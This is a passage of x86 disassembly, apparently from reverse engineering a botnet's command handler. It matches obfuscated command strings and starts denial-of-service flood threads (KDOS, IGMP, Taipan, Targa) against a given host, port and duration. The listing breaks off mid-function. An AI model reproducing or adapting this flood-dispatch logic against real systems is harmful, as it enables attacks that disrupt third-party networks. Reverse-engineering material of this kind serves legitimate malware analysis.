cmp [ebp+arg_18], 0
jnz short loc_408C61
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_408C5B: ; CODE XREF: sub_403B2C+50FC�j
cmp [ebp+arg_18], 0
jz short loc_408C8B
loc_408C61: ; CODE XREF: sub_403B2C+5102�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 1Ch
loc_408C8B: ; CODE XREF: sub_403B2C+5133�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push 12h
call sub_41BED7
add esp, 18h
mov [ebp+var_CEC], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_E08]
push esi
push eax
push offset sub_41112E
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_CEC]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jnz short loc_408D2E
loc_408CE9: ; CODE XREF: sub_403B2C+5394�j
; sub_403B2C+5544�j ...
cmp [ebp+arg_14], 0
mov esi, offset aSFailedToSta_1 ; "%s Failed to start thread, error: (%d)."...
jnz short loc_408D11
cmp [ebp+arg_18], 0
jnz short loc_408D1B
call dword_42F068 ; RtlGetLastWin32Error
push eax
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_408D11: ; CODE XREF: sub_403B2C+51C6�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_408D1B: ; CODE XREF: sub_403B2C+51CC�j
call dword_42F068 ; RtlGetLastWin32Error
jmp loc_4041AF
; ---------------------------------------------------------------------------
loc_408D26: ; CODE XREF: sub_403B2C+5209�j
push 32h
call dword_42F15C ; Sleep
loc_408D2E: ; CODE XREF: sub_403B2C+51BB�j
cmp [ebp+var_CDC], 0
jz short loc_408D26
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_408D3C: ; CODE XREF: sub_403B2C+5042�j
push dword ptr [esi]
push offset aPsern1aagh6_ ; "pSern1AAGh6."
call ebx ; dword_42F070
test eax, eax
jnz loc_408EDE
xor ebx, ebx
cmp [esi+4], ebx
jz loc_4092AB
cmp [esi+8], ebx
jz loc_4092AB
cmp [esi+0Ch], ebx
jz loc_4092AB
cmp [esi+10h], ebx
jz loc_4092AB
push 12h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jg loc_4090D5
mov eax, [ebp+arg_14]
mov [ebp+var_F44], eax
mov eax, [ebp+arg_18]
mov [ebp+var_F48], eax
cmp eax, ebx
lea eax, [ebp+var_1060]
jnz short loc_408DA8
push dword ptr [edi+0Ch]
jmp short loc_408DAA
; ---------------------------------------------------------------------------
loc_408DA8: ; CODE XREF: sub_403B2C+5275�j
push dword ptr [edi]
loc_408DAA: ; CODE XREF: sub_403B2C+527A�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1068], eax
push dword ptr [esi+4]
lea eax, [ebp+var_FE0]
push eax
call sub_4222F0
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_F54], eax
push dword ptr [esi+0Ch]
call sub_422B5A
mov [ebp+var_F50], eax
push dword ptr [esi+10h]
call sub_422B5A
add esp, 18h
cmp [ebp+arg_14], 0
mov [ebp+var_F58], eax
mov ebx, offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
jnz short loc_408E34
cmp [ebp+arg_18], 0
jnz short loc_408E3A
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_408E34: ; CODE XREF: sub_403B2C+52D5�j
cmp [ebp+arg_18], 0
jz short loc_408E64
loc_408E3A: ; CODE XREF: sub_403B2C+52DB�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 1Ch
loc_408E64: ; CODE XREF: sub_403B2C+530C�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push 12h
call sub_41BED7
add esp, 18h
mov [ebp+var_F4C], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_1068]
push esi
push eax
push offset sub_41130C
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_F4C]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jz loc_408CE9
jmp short loc_408ED0
; ---------------------------------------------------------------------------
loc_408EC8: ; CODE XREF: sub_403B2C+53AB�j
push 32h
call dword_42F15C ; Sleep
loc_408ED0: ; CODE XREF: sub_403B2C+539A�j
cmp [ebp+var_F3C], 0
jz short loc_408EC8
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_408EDE: ; CODE XREF: sub_403B2C+521B�j
push dword ptr [esi]
push offset aXkg84_cesgs_ ; "XkG84.cESgs."
call ebx ; dword_42F070
test eax, eax
jnz loc_40908E
xor ebx, ebx
cmp [esi+4], ebx
jz loc_4092AB
cmp [esi+8], ebx
jz loc_4092AB
cmp [esi+0Ch], ebx
jz loc_4092AB
cmp [esi+10h], ebx
jz loc_4092AB
push 12h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jg loc_4090D5
mov eax, [ebp+arg_14]
mov [ebp+var_A90], eax
mov eax, [ebp+arg_18]
mov [ebp+var_A94], eax
cmp eax, ebx
lea eax, [ebp+var_BAC]
jnz short loc_408F4A
push dword ptr [edi+0Ch]
jmp short loc_408F4C
; ---------------------------------------------------------------------------
loc_408F4A: ; CODE XREF: sub_403B2C+5417�j
push dword ptr [edi]
loc_408F4C: ; CODE XREF: sub_403B2C+541C�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_BB4], eax
push dword ptr [esi+4]
lea eax, [ebp+var_B2C]
push eax
call sub_4222F0
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_AA0], eax
push dword ptr [esi+0Ch]
call sub_422B5A
mov [ebp+var_A9C], eax
push dword ptr [esi+10h]
call sub_422B5A
mov [ebp+var_AA4], eax
xor eax, eax
add esp, 18h
cmp [ebp+arg_60], eax
mov ebx, offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
setnz al
cmp [ebp+arg_14], 0
mov [ebp+var_A8C], eax
jnz short loc_408FE4
cmp [ebp+arg_18], 0
jnz short loc_408FEA
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_408FE4: ; CODE XREF: sub_403B2C+5485�j
cmp [ebp+arg_18], 0
jz short loc_409014
loc_408FEA: ; CODE XREF: sub_403B2C+548B�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 1Ch
loc_409014: ; CODE XREF: sub_403B2C+54BC�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push 12h
call sub_41BED7
add esp, 18h
mov [ebp+var_A98], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_BB4]
push esi
push eax
push offset sub_4114B5
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_A98]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jz loc_408CE9
jmp short loc_409080
; ---------------------------------------------------------------------------
loc_409078: ; CODE XREF: sub_403B2C+555B�j
push 32h
call dword_42F15C ; Sleep
loc_409080: ; CODE XREF: sub_403B2C+554A�j
cmp [ebp+var_A88], 0
jz short loc_409078
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40908E: ; CODE XREF: sub_403B2C+53BD�j
push dword ptr [esi]
push offset aP06vqBfbmo_ ; "p06vq/BFBMo."
call ebx ; dword_42F070
test eax, eax
jnz loc_4092BA
xor ebx, ebx
cmp [esi+4], ebx
jz loc_4092AB
cmp [esi+8], ebx
jz loc_4092AB
cmp [esi+0Ch], ebx
jz loc_4092AB
cmp [esi+10h], ebx
jz loc_4092AB
push 12h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jle short loc_40911A
loc_4090D5: ; CODE XREF: sub_403B2C+507C�j
; sub_403B2C+5255�j ...
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
jnz short loc_409103
cmp [ebp+arg_18], 0
jnz short loc_40910D
push [ebp+arg_C]
push offset aKdosThreads ; "KDOS Threads"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_409103: ; CODE XREF: sub_403B2C+55B7�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_40910D: ; CODE XREF: sub_403B2C+55BD�j
push [ebp+arg_C]
push offset aKdosThreads ; "KDOS Threads"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_40911A: ; CODE XREF: sub_403B2C+55A7�j
mov eax, [ebp+arg_14]
mov [ebp+var_E14], eax
mov eax, [ebp+arg_18]
mov [ebp+var_E18], eax
cmp eax, ebx
lea eax, [ebp+var_F30]
jnz short loc_40913B
push dword ptr [edi+0Ch]
jmp short loc_40913D
; ---------------------------------------------------------------------------
loc_40913B: ; CODE XREF: sub_403B2C+5608�j
push dword ptr [edi]
loc_40913D: ; CODE XREF: sub_403B2C+560D�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_F38], eax
push dword ptr [esi+4]
lea eax, [ebp+var_EB0]
push eax
call sub_4222F0
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_E24], eax
push dword ptr [esi+0Ch]
call sub_422B5A
mov [ebp+var_E20], eax
push dword ptr [esi+10h]
call sub_422B5A
add esp, 18h
cmp [ebp+arg_14], 0
mov [ebp+var_E28], eax
mov ebx, offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
jnz short loc_4091C7
cmp [ebp+arg_18], 0
jnz short loc_4091CD
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_4091C7: ; CODE XREF: sub_403B2C+5668�j
cmp [ebp+arg_18], 0
jz short loc_4091F7
loc_4091CD: ; CODE XREF: sub_403B2C+566E�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 1Ch
loc_4091F7: ; CODE XREF: sub_403B2C+569F�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push 12h
call sub_41BED7
add esp, 18h
mov [ebp+var_E1C], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_F38]
push esi
push eax
push offset sub_41186E
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_E1C]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jnz short loc_40929D
cmp [ebp+arg_14], esi
mov esi, dword_42F068
jnz short loc_40927D
cmp [ebp+arg_18], 0
jnz short loc_409287
call esi ; dword_42F068
push eax
push ebx
push offset aSFailedToSta_2 ; "%s Failed to start thread, error: (%d)"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_40927D: ; CODE XREF: sub_403B2C+5732�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_409287: ; CODE XREF: sub_403B2C+5738�j
call esi ; dword_42F068
push eax
push ebx
push offset aSFailedToSta_2 ; "%s Failed to start thread, error: (%d)"
jmp loc_40A5C3
; ---------------------------------------------------------------------------
loc_409295: ; CODE XREF: sub_403B2C+5778�j
push 32h
call dword_42F15C ; Sleep
loc_40929D: ; CODE XREF: sub_403B2C+5727�j
cmp [ebp+var_E0C], 0
jz short loc_409295
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_4092AB: ; CODE XREF: sub_403B2C+504D�j
; sub_403B2C+5056�j ...
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_4092BA: ; CODE XREF: sub_403B2C+556D�j
push dword ptr [esi]
push offset a3vvsv1vurua ; "3VVsV1VuRUA/"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4092D3
push offset aKdos ; "KDOS"
push 12h
jmp loc_409B7C
; ---------------------------------------------------------------------------
loc_4092D3: ; CODE XREF: sub_403B2C+5799�j
push dword ptr [esi]
push offset a2onvg1wfjmb1 ; "2ONVG1WFjmb1"
call ebx ; dword_42F070
test eax, eax
jnz loc_4094C3
xor ebx, ebx
cmp [esi+4], ebx
jz loc_4094B4
cmp [esi+8], ebx
jz loc_4094B4
cmp [esi+0Ch], ebx
jz loc_4094B4
cmp [esi+10h], ebx
jz loc_4094B4
push 13h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jle short loc_40935D
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset a2fulsVpayi0 ; "2FUlS/VPAyI0"
jnz short loc_409346
cmp [ebp+arg_18], 0
jnz short loc_409350
push eax
push offset aIgmpThreads ; "IGMP Threads"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_409346: ; CODE XREF: sub_403B2C+57FC�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_409350: ; CODE XREF: sub_403B2C+5802�j
push [ebp+arg_C]
push offset aIgmpThreads ; "IGMP Threads"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_40935D: ; CODE XREF: sub_403B2C+57EC�j
mov eax, [ebp+arg_14]
mov [ebp+var_BBC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_BC0], eax
cmp eax, ebx
lea eax, [ebp+var_C50]
jnz short loc_40937E
push dword ptr [edi+0Ch]
jmp short loc_409380
; ---------------------------------------------------------------------------
loc_40937E: ; CODE XREF: sub_403B2C+584B�j
push dword ptr [edi]
loc_409380: ; CODE XREF: sub_403B2C+5850�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_CD8], eax
push dword ptr [esi+4]
lea eax, [ebp+var_CD0]
push eax
call sub_4222F0
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_BCC], eax
push dword ptr [esi+0Ch]
call sub_422B5A
mov [ebp+var_BC8], eax
push dword ptr [esi+10h]
call sub_422B5A
add esp, 18h
cmp [ebp+arg_14], 0
mov [ebp+var_BC4], eax
mov ebx, offset a2fulsVpayi0 ; "2FUlS/VPAyI0"
jnz short loc_40940A
cmp [ebp+arg_18], 0
jnz short loc_409410
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_40940A: ; CODE XREF: sub_403B2C+58AB�j
cmp [ebp+arg_18], 0
jz short loc_40943A
loc_409410: ; CODE XREF: sub_403B2C+58B1�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 1Ch
loc_40943A: ; CODE XREF: sub_403B2C+58E2�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
push 13h
call sub_41BED7
add esp, 18h
mov [ebp+var_BD0], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_CD8]
push esi
push eax
push offset sub_40FA20
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_BD0]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jz loc_408CE9
jmp short loc_4094A6
; ---------------------------------------------------------------------------
loc_40949E: ; CODE XREF: sub_403B2C+5981�j
push 32h
call dword_42F15C ; Sleep
loc_4094A6: ; CODE XREF: sub_403B2C+5970�j
cmp [ebp+var_BB8], 0
jz short loc_40949E
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_4094B4: ; CODE XREF: sub_403B2C+57BD�j
; sub_403B2C+57C6�j ...
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset a2fulsVpayi0 ; "2FUlS/VPAyI0"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_4094C3: ; CODE XREF: sub_403B2C+57B2�j
push dword ptr [esi]
push offset aZqhijZaeza_ ; "ZqhIJ/ZaEZa."
call ebx ; dword_42F070
test eax, eax
jnz short loc_4094DC
push offset aIgmp ; "IGMP"
push 13h
jmp loc_40A155
; ---------------------------------------------------------------------------
loc_4094DC: ; CODE XREF: sub_403B2C+59A2�j
push dword ptr [esi]
push offset aZk1tr0lpp5r0 ; "Zk1Tr0lpP5R0"
call ebx ; dword_42F070
test eax, eax
jnz loc_4096E3
xor ebx, ebx
cmp [esi+4], ebx
jz loc_4096D4
cmp [esi+8], ebx
jz loc_4096D4
cmp [esi+0Ch], ebx
jz loc_4096D4
cmp [esi+10h], ebx
jz loc_4096D4
push 14h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jle short loc_409566
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset aXtyre1_rjar_xf ; "XtyrE1.RJaR.xfK1r.VuQwI."
jnz short loc_40954F
cmp [ebp+arg_18], 0
jnz short loc_409559
push eax
push offset aTaipanThreads ; "Taipan Threads"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_40954F: ; CODE XREF: sub_403B2C+5A05�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_409559: ; CODE XREF: sub_403B2C+5A0B�j
push [ebp+arg_C]
push offset aTaipanThreads ; "Taipan Threads"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_409566: ; CODE XREF: sub_403B2C+59F5�j
mov eax, [ebp+arg_14]
mov [ebp+var_96C], eax
mov eax, [ebp+arg_18]
mov [ebp+var_970], eax
cmp eax, ebx
lea eax, [ebp+var_A00]
jnz short loc_409587
push dword ptr [edi+0Ch]
jmp short loc_409589
; ---------------------------------------------------------------------------
loc_409587: ; CODE XREF: sub_403B2C+5A54�j
push dword ptr [edi]
loc_409589: ; CODE XREF: sub_403B2C+5A59�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_A84], eax
push dword ptr [esi+4]
lea eax, [ebp+var_A80]
push eax
call sub_4222F0
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_97C], eax
push dword ptr [esi+0Ch]
call sub_422B5A
mov [ebp+var_978], eax
push dword ptr [esi+10h]
call sub_422B5A
add esp, 18h
cmp eax, 1
mov [ebp+var_974], eax
mov ebx, offset aXtyre1_rjar_xf ; "XtyrE1.RJaR.xfK1r.VuQwI."
jl loc_409A6E
xor eax, eax
xor ecx, ecx
cmp [ebp+arg_60], eax
setnz cl
cmp [ebp+arg_14], eax
mov [ebp+var_968], ecx
jnz short loc_40962A
cmp [ebp+arg_18], eax
jnz short loc_409630
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecS ; "%s --> (%s:%d) for %d sec's"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_40962A: ; CODE XREF: sub_403B2C+5ACC�j
cmp [ebp+arg_18], 0
jz short loc_40965A
loc_409630: ; CODE XREF: sub_403B2C+5AD1�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecS ; "%s --> (%s:%d) for %d sec's"
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 1Ch
loc_40965A: ; CODE XREF: sub_403B2C+5B02�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSForDSecS ; "%s --> (%s) for %d sec's"
push 14h
call sub_41BED7
add esp, 18h
mov [ebp+var_980], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_A84]
push esi
push eax
push offset sub_41B824
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_980]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jz loc_408CE9
jmp short loc_4096C6
; ---------------------------------------------------------------------------
loc_4096BE: ; CODE XREF: sub_403B2C+5BA1�j
push 32h
call dword_42F15C ; Sleep
loc_4096C6: ; CODE XREF: sub_403B2C+5B90�j
cmp [ebp+var_964], 0
jz short loc_4096BE
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_4096D4: ; CODE XREF: sub_403B2C+59C6�j
; sub_403B2C+59CF�j ...
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aXtyre1_rjar_xf ; "XtyrE1.RJaR.xfK1r.VuQwI."
jmp loc_407722
; ---------------------------------------------------------------------------
loc_4096E3: ; CODE XREF: sub_403B2C+59BB�j
push dword ptr [esi]
push offset a6ldraK4kds ; "6ldRA/K4kDS/"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4096FC
push offset aTaipan ; "TaiPan"
push 14h
jmp loc_409B7C
; ---------------------------------------------------------------------------
loc_4096FC: ; CODE XREF: sub_403B2C+5BC2�j
push dword ptr [esi]
push offset aX_62c_3ldcp ; "X.62C.3LDCP/"
call ebx ; dword_42F070
test eax, eax
jnz loc_409921
xor ebx, ebx
cmp [esi+4], ebx
jz loc_409912
cmp [esi+8], ebx
jz loc_409912
cmp [esi+0Ch], ebx
jz loc_409912
cmp [esi+10h], ebx
jz loc_409912
push 15h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jle short loc_409786
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset aZshqz13bz2w1 ; "ZsHqZ13bZ2w1"
jnz short loc_40976F
cmp [ebp+arg_18], 0
jnz short loc_409779
push eax
push offset aTargaThreads ; "Targa Threads"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_40976F: ; CODE XREF: sub_403B2C+5C25�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_409779: ; CODE XREF: sub_403B2C+5C2B�j
push [ebp+arg_C]
push offset aTargaThreads ; "Targa Threads"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_409786: ; CODE XREF: sub_403B2C+5C15�j
mov eax, [ebp+arg_14]
mov [ebp+var_153C], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1540], eax
cmp eax, ebx
lea eax, [ebp+var_15D4]
jnz short loc_4097A7
push dword ptr [edi+0Ch]
jmp short loc_4097A9
; ---------------------------------------------------------------------------
loc_4097A7: ; CODE XREF: sub_403B2C+5C74�j
push dword ptr [edi]
loc_4097A9: ; CODE XREF: sub_403B2C+5C79�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_16D8], eax
push dword ptr [esi+4]
lea eax, [ebp+var_16D4]
push eax
call sub_4222F0
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_1550], eax
push dword ptr [esi+0Ch]
call sub_422B5A
mov [ebp+var_154C], eax
push dword ptr [esi+10h]
call sub_422B5A
add esp, 18h
cmp eax, 1
mov [ebp+var_1548], eax
mov ebx, offset aZshqz13bz2w1 ; "ZsHqZ13bZ2w1"
jl loc_409A6E
xor eax, eax
xor ecx, ecx
cmp [ebp+arg_60], eax
setnz cl
cmp [ebp+arg_14], eax
mov [ebp+var_1538], ecx
jnz short loc_409854
cmp [ebp+arg_18], eax
jnz short loc_40985A
push dword ptr [esi+10h]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecSWit ; "%s --> (%s:%d) for %d sec's with %d del"...
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 20h
loc_409854: ; CODE XREF: sub_403B2C+5CEC�j
cmp [ebp+arg_18], 0
jz short loc_40988E
loc_40985A: ; CODE XREF: sub_403B2C+5CF1�j
push dword ptr [esi+10h]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecSWit ; "%s --> (%s:%d) for %d sec's with %d del"...
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 20h
loc_40988E: ; CODE XREF: sub_403B2C+5D2C�j
push dword ptr [esi+10h]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDForDSecSWit ; "%s --> (%s:%d) for %d sec's with %d del"...
push 15h
call sub_41BED7
add esp, 1Ch
mov [ebp+var_1554], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_16D8]
push esi
push eax
push offset sub_41BB8F
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_1554]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jz loc_408CE9
jmp short loc_409904
; ---------------------------------------------------------------------------
loc_4098FC: ; CODE XREF: sub_403B2C+5DDF�j
push 32h
call dword_42F15C ; Sleep
loc_409904: ; CODE XREF: sub_403B2C+5DCE�j
cmp [ebp+var_1534], 0
jz short loc_4098FC
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_409912: ; CODE XREF: sub_403B2C+5BE6�j
; sub_403B2C+5BEF�j ...
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aZshqz13bz2w1 ; "ZsHqZ13bZ2w1"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_409921: ; CODE XREF: sub_403B2C+5BDB�j
push dword ptr [esi]
push offset aWt4rnWgl6v_ ; "wt4Rn/WGL6V."
call ebx ; dword_42F070
test eax, eax
jnz short loc_40993A
push offset aTarga ; "Targa"
push 15h
jmp loc_409B7C
; ---------------------------------------------------------------------------
loc_40993A: ; CODE XREF: sub_403B2C+5E00�j
push dword ptr [esi]
